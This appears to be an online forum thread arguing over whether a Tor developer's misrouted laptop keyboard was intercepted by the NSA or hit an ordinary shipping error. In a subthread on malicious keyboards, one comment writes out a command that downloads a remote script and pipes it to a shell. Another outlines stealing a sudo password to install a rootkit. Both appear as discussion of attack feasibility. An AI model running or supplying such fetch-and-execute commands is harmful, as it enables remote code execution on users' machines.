
Oh, I like this game. Let's play again: WHICH IS MORE LIKELY?!

* The world's largest online retailer that does $54M in sales per day has a bug in its procurement system that randomly transposes tracking codes.

ORRRRRRRR!

* The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.

On the other hand, what's great about your way of putting it is that it juxtaposes your belief in the all-encompassing nature of the NSA's programs with your incredulity that such a program might have been applied specifically here. I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that there's no scenario in which you could be convinced that the NSA did anything.

And yet again, maybe it's time to stop thinking of the NSA as some far-off abstraction and start thinking about it as an actual thing that affects our daily lives.




As if Amazon is the only place for a screwup to happen here. There are a lot of different benign possibilities:

1. Amazon transposed a tracking code.

2. A third-party reseller transposed a tracking code.

3. USPS transposed a tracking code.

4. The tracking code is correct, but an error in USPS's backend showed tracking data for another shipment anyway.

5. The tracking code is correct, and the tracking data is correct, and the package went to Virginia because USPS screwed up.

I've personally seen #5, and none of the others are all that hard to believe.


I don't understand. Richard's point doesn't depend on an Amazon bug that transposes tracking codes. But your point does depend on the NSA redirecting packages to Alexandria in such a way that anyone who checked their order status would notice.


Why do you think NSA cares much about hiding their activities from you?

I can tell you a story. Some years ago, back in Russia, as a [naive] kid, I developed a surveillance system for Telrad telecom exchange [ultimately for FSB]. Do you think anyone cared to do that project in secrecy? I can give you the answer. Nope.

As far as I understand, NSA can legally intercept packages and can legally install undetectable surveillance devices. As long as they are not using collected surveillance data, legally they are fine and they do not absolutely have to hide their activities at all costs. Hiding a large-scale operation is difficult and plugging every information leak is expensive. So they are not necessarily prioritizing that. So, yes, there is a chance that we simply see their activity. And yes, it could be just an Amazon bug.


During the cold war (and shortly after), this type of activity would be exactly what red-blooded Americans would say differentiated us from Russia (not hiding it, but doing it at all). Americans have constitutional protection against unreasonable search and seizure by the government.

These days you could probably drop the country and year and have trouble differentiating tactics used by the US and Russia.


It would be pretty stupid for a spy agency to give a target clear warning that their electronics were tampered with.

Isn't the whole point of this program to capture information that the target wouldn't otherwise broadcast publicly?


Gee, I don't know what gave me the impression that NSA was secretive.


It's going after low-hanging fruit to say this and while the link I'm providing is not the NSA, our government agencies seem to have a real hard time keeping secrets lately.

http://www.techdirt.com/articles/20131220/10200525651/fbi-ag...

Apparently keeping secrets is hard. Human error and all.


And why Alexandria?

Part of this discussion seems based on a lack of understanding of the geography of the DC area. Alexandria is near these agencies, omg! But the fact is that there isn't much government in Alexandria. USPTO is there, and otherwise it's charming old houses, quirky shops, crappy strip malls, cookie-cutter suburbia, smallish high-rise apartments, railroad facilities, light industry, and other such similar things.

It's roughly like seeing your Mac get misdelivered to Richmond, CA and deciding that holy crap it's been intercepted by Apple on its way to me.


The NSA does rely heavily on outside contractors though.

Maybe this page is of interest?

https://www.ida.org/aboutus/organization/hpcc.php

http://en.wikipedia.org/wiki/Institute_for_Defense_Analyses

Spy the address down at the bottom.

And if you wanna get really crazy or are just interested: http://en.wikipedia.org/wiki/Columbia_University_protests_of...


I don't get it. Why is an administrative non-profit at all interesting here?


You're using public sources of information to refute theories of where a highly-secret and officially-denied program might operate. That makes no sense.

Whatever office, department, or contractor does the NSA's package intercepts, all public sources will describe it as something innocent and unrelated.


The guy I responded to is using that same information to try to support the theories. Either the info is good, or it's not.

I have no particular objection to saying, "this stuff would be secret so of course there would be no information on it". Oddly, nobody has actually tried that.

However, that still goes back to the point I raised: why Alexandria? It's not particularly convenient to the NSA. It's not convenient to shippers. It doesn't have anything special in the way of infrastructure. So it would be quite an odd choice. Possible, but it's not the smoking gun the article makes it out to be.


I specifically stated that I was just trying to point out that, despite your claim, there's something interesting in Alexandria.

There's no point in debating speculations beyond that because we don't have any information for or against.

It's just me stating "hey, it's possible" and refuting your suggestion that there isn't anything in Alexandria that could cause concern. I'm only answering a question you asked.


Did you actually read the three paragraphs on the first linked page?


The ones that say their research activities occur in California and New Jersey?


Yes, one part of what they do is in NJ/CA. Alexandria is where they're based. I'm not leaping to any conclusion; it just seems remotely possible and they're based there. You're the one saying there's nothing interesting in Alexandria.

Given what the company researches, their history and mission, it seems like exactly the sort of place where this wild theory suggested by the OP could be a reality.


The headquarters of a company like this isn't interesting. Headquarters are administrative centers. It's not where you send a laptop to have a bug installed.


A bug is only one of many possibilities for what they could want with that keyboard.

The people in that building are highly trusted whereas the NSA has good reason not to trust the brilliant geeks working for their contractors.


Huh? Those people are contractors.


I'll have to be explicit since this seems hard to understand:

You're the NSA. Who do you trust more: A) (Perhaps the) CTO of a defense contractor that only works for you that you've had a 20 year working relationship with? B) The bright eyed young scientists working for that contractor in a building 3000 miles away?

Or put another way, despite the Snowden leak, I'll bet you any amount of money that the NSA is still in "really fucking tight" with Booz Allen Hamilton.

Or: duh OPSEC.


You're right, it is pretty hard to understand.

In one paragraph, you seem to be saying that the NSA wouldn't trust the employees of contractors. In the next paragraph, you tell me that the NSA is still "really fucking tight" with Booz Allen. These two ideas seem completely contradictory.

But I think you might be suggesting that the NSA has given up on the low-level employees, and is now having the executives of these companies do the work directly. Which seems completely ludicrous to me, as no C-level at a company like this (even the CTO) is going to have the requisite skills, and even if he did he's not going to have the time.


You think along the narrowest lines of anyone I've ever held a conversation with.

Not executives specifically but somebody trusted. That's more likely to be in the building where administration is done than anywhere else. Also you want to separate research from implementation. Your narrow refusal to even consider that there might be an interesting place for an agency to ship a laptop component to in Alexandria has taken this exercise way further than it needs to be to demonstrate the point.


What you see as narrow thinking is just complete disagreement on how companies like this are structured.

For example, I live a couple of miles from the headquarters of Exxon Mobil. Yet it's about the last place I'd look if I wanted to find a trustworthy person to drill an oil well or build a gas pipeline.

Also, I'm not refusing to consider that Alexandria might be a viable destination for this. I merely think it's unlikely, especially compared to the "military and intelligence belt" language used in the post.


No one thinks redirection would be visible to 'anyone'. The theory is this could be a one-time screw-up, like a redaction failure, revealing a waypoint that was supposed to be secret. (Maybe a label that was supposed to go on the outer box went on the inner box instead?)

I'd agree an innocent screw-up is far more likely, here and in any particular case where something weird happens. Weird stuff happens with shipping all the time.

But since we know shipment interception is part of the NSA toolkit, and the NSA cares about Tor, people aren't crazy to be curious and even paranoid around remote possibilities. And if I were a Tor developer, I might buy all my hardware from store shelves with cash.


No, he's saying that anyone who checked their order status shouldn't notice (by design), but maybe that part of the process failed this time.

Also, that failure might be technical or intentional. As I mentioned on another subthread, it's always possible this was "accidentally" exposed by an employee working at the merchant or postal service. The program would require their cooperation. After all, we first learned about the telco spying because telco employees spoke up.

As for whether it's conceivable that NSA would target a Tor developer? A few months ago they were spying on our close friends and allies simply because they could. If that same mindset were applied to the intercept program, then this isn't impossible to imagine. Just because the NSA and administration has finally recognized their overreach and has started backpedalling doesn't mean these programs change overnight.


It is difficult to predict NSA actions, but opportunistically putting up inexpensive surveillance on all Tor users and nodes seems like a reasonable thing to do. As a developer she is a Tor user and also probably operates a few Tor nodes [for debugging and testing purposes]. So she would be in that group. I think this is plausible. I doubt that NSA would specifically target a Tor developer in US, without court order, as this would probably be illegal. [Although subverting some Tor developers, especially ones who build Tor binaries would be useful.]


I work in e-commerce, we get bad/transposed tracking numbers entered into our systems all the freaking time.


> The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.

A few comments:

• This "low-level operative" was a system administrator who used social engineering to obtain other people's authentication credentials and gain access to material to which he wasn't authorized. He wasn't the janitor or some clueless field agent.

• Did Snowden expose operational shortcomings? Absolutely. A lot of the programs that have been publicly revealed through his leaks have been running for over a decade without ever seeing the light of day, though. That tells me these "pervasive operational shortcomings" aren't very pervasive. (If they were, the NSA would be absolute shit at their mission.)

• I don't think Andrea is a "high value target," or at least high value enough to risk compromising whatever method they might use to bug her keyboard. I don't say this to belittle her or her work in any way — she seems to be a skilled programmer/hacker/infosec person. And that's exactly why this whole "the NSA is bugging her keyboard" theory doesn't make any sense.

Let's assume for the sake of argument that the NSA had planned to bug her keyboard, and that keyboard is now sitting in an NSA (or contractor) facility in/near Alexandria, Virginia, waiting for some modification to be made before shipping it back out. But, oops, they screwed up and forgot to fake the USPS tracking information. They know she knows because she tweeted about it. She's also tweeted that she can never trust the keyboard if/when it shows up. Why would they ship her a bugged keyboard at this point? If/when the keyboard shows up, she's probably going to take it apart and share anything interesting she finds with the world. There will be hard evidence.

Even if they hadn't bungled the tracking information in our hypothetical argument, they're risking exposure of the exact methods they use to bug a machine for not much potential gain. (Remember, Andrea's a skilled hacker/programmer. There's a very good chance she'll figure out what's going on and tell the world if she has any inkling that her laptop's been tampered with.)

• The keyboard she ordered fits a ThinkPad T60/T61/T400/T500 (and the equivalent "R" models, plus a few others). Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.

• I said that I don't think Andrea is a "high value target," despite her work on Tor, because everything about Tor is open. Anyone can download the code and see exactly how it works. The protocol is well-known. There's no curtain to peek behind and gain strategic information about Tor's workings.

So while I don't reject the argument that the NSA is trying to bug her laptop as impossible, I think it's exceedingly improbable. My money's still on "seller screwed up the tracking number."

> I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that there's no scenario in which you could be convinced that the NSA did anything.

The flip side of this argument, which everyone here seems to be clutching onto and running with, is that if the NSA is capable of it, they're doing it at every available opportunity, even when it doesn't make any sense to.


> Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.

This is a joke, right? A keyboard and a keylogger would give you everything you need to root a computer.


My point was that the modified keyboard alone couldn't do it. It's not a FireWire device that can read/write things from/to memory however it pleases, insta-pwning a computer as soon as it's connected (unless something like VT-d is being used to contain DMA transfers). It's not even a USB device that could abuse some poorly written driver to gain access.

If a hypothetical modified keyboard is logging keystrokes, someone has to eventually retrieve it to get the logged data. If it's transmitting keystrokes via radio, someone has to be nearby to capture them and then steal the laptop to get at its (presumably encrypted) data.


Devil's advocate: you don't necessarily need all the data - the keystrokes are plenty valuable information on their own.

Alternatively, such a keyboard could try to do something clever when a shell is focused, although it's risky.


Why when a shell is focused? Better to wait until the keyboard has been idle for some time, then send the keystrokes to open a shell, execute the needed commands, and close it afterward.


You don't need a shell to be focused to run commands.


Right. Snag root or sudo password. Download rootkit. Execute.


What would you need DMA for?

Here's a fun thought exercise for you, since my first reply didn't spark one. Imagine you're an evil keyboard. What evil could you accomplish? Hint: you don't even need your own radio, the computer's already got one.


Here's a nice example: http://www.blackhat.com/presentations/bh-usa-09/CHEN/BHUSA09...

"we describe how to tamper with a firmware upgrade to the Apple Aluminum Keyboard. We describe how an attacker can subvert an off-the-shelf keyboard by embedding into the firmware malicious code which allows a rootkit to survive a clean re-installation of the host operating system."


DMA via FireWire (or Thunderbolt or similar) allows you to very quickly poke at system memory with a near-zero risk of being detected.

An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.

Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.


I would speculate that they might be interested in submitting a patch that compromises the Tor network in some subtle way that only they can exploit, and doing it in her name. Maybe added on to some other big change she submitted, in the hope that nobody will notice it.

Seems the Tor project is using Git for all of their projects, so doing something like that would probably require pwning whatever system she's creating commits on. I will say that putting a bug or something in her keyboard doesn't seem like a terribly efficient way of doing this.


The Tor project was started by the US Navy, and receives 80% of its funding from the US Government. This is how you think they get them?


I don't really think that they're trying to break Tor like this. More of a thought experiment - to figure out the likelihood that this is part of an attempt to break Tor, run through the details of exactly how this would be part of such an attempt. It doesn't sound all that practical when you run through how it would work if it was. If they wanted to do it, you'd think they have better ways than a rather sloppy attempt to intercept a laptop keyboard shipment, if that's actually what this was, instead of an ordinary shipment screw-up.


All good points, and I'd second that Andrea is unlikely to be a "high value target" [BTW, curious, who is building and releasing Tor binaries and Tor dependencies binaries?]. Still, as a developer she is a Tor user and it is possible that NSA opportunistically targets all Tor users. And even if not, I'm still finding it distasteful that NSA can legally intercept post and put up dragnet surveillance. It feels like they are using legal loopholes too. Not fair.


Tor releases are signed. Andrea does not have a signing key, and she does not run builds. List of people who sign,

https://www.torproject.org/docs/signing-keys.html.en


That generated more response than I expected. I actually do agree that, on balance, it's somewhat more likely that it's just a benign glitch; I should have said that. What I was really taking issue with is the dismissiveness with which you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.

So with less snark: I don't think it's exceedingly improbable at all, and whether ultimately it turns out to be the case or not, smugly guffawing the idea that the NSA may have used a trick like that isn't warranted. They really do intercept people's laptop shipments [1] to plant malware in them. They really do sneak tiny radio transmitters into end-user hardware. They really are trying to get backdoors into communication tools. I'll put it this way: if I worked on the kind of software Andrea works on, I would be seriously alarmed. Would you keep the keyboard?

On some specific points you made:

* That Snowden had access to other people's credentials seems like a serious operational shortcoming to me. The "low-level" part wasn't an attack on Snowden; the point is that a lot of people have that level of access. In general, the US intelligence apparatus makes a lot of well-publicized mistakes; I'm sure they make a great number of more subtle ones.

* On the NSA's shortcomings generally, I think this is actually nicely illustrative. Because a lot of the stuff Snowden revealed were things a lot of credible people already believed, based on things like weird locked server closets in telecom buildings and PRNGs that seemed fishy and pointless and hearsay reports of requests for backdoor access to communication tools and so on. There was just little hard evidence before Snowden. And there won't be here either. So this is entirely consistent with what the NSA was like in those decades where their programs "never saw the light of day".

* I think being a core Tor developer makes her a high value target. It's hard to imagine the NSA wanting to subvert all the things it's subverted and not wanting to backdoor Tor. Keylogging her keyboard is a great way to do that, either by compromising her somehow, or by just stealing her credentials. So I don't follow the "it doesn't make any sense" line of thinking.

* That she's now tweeted about it certainly makes it unlikely that, if the NSA has it, they'll go through with sending it bugged. But so?

Where I come out on this is that yes, it's probably nothing, but it should be treated with suspicion and carefulness, not laughed off because haha, what, do you think you're in a spy movie or something? Because, basically, we are.

[1] Yes, I know this is just the keyboard. I don't think that's a relevant difference.


> What I was really taking issue with is the dismissiveness with which you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.

I was dismissing the linked blog post as much as the suggestion of NSA involvement. The blog post took a single tweet with a single screenshot, screwed up half the facts ("tracking details for a computer Shepard ordered" — uh, no, it was a used laptop keyboard), sensationalized the other half ("it moved another four times around the military and industrial belt" — uh, no, it moved from IAD to Alexandria), and tacked a pile of rhetorical questions and conjecture on the end.

I somehow expected better from an ACLU chapter.


USPS tracking codes aren't the most accurate thing.


A couple weeks ago, my wife received an order from Banana Republic that was intended for a recipient in Newfoundland. The correct recipient's name was on the packlist inside the box but they showed it to the wrong person. Likewise, my wife's actual offer took a few days longer to arrive, too. I suspect it was a simple mistake in the warehouse where an operator had two boxes, printed waybill stickers for both, and then slapped them on the wrong - already sealed - packages. I bet similar things happen regularly.



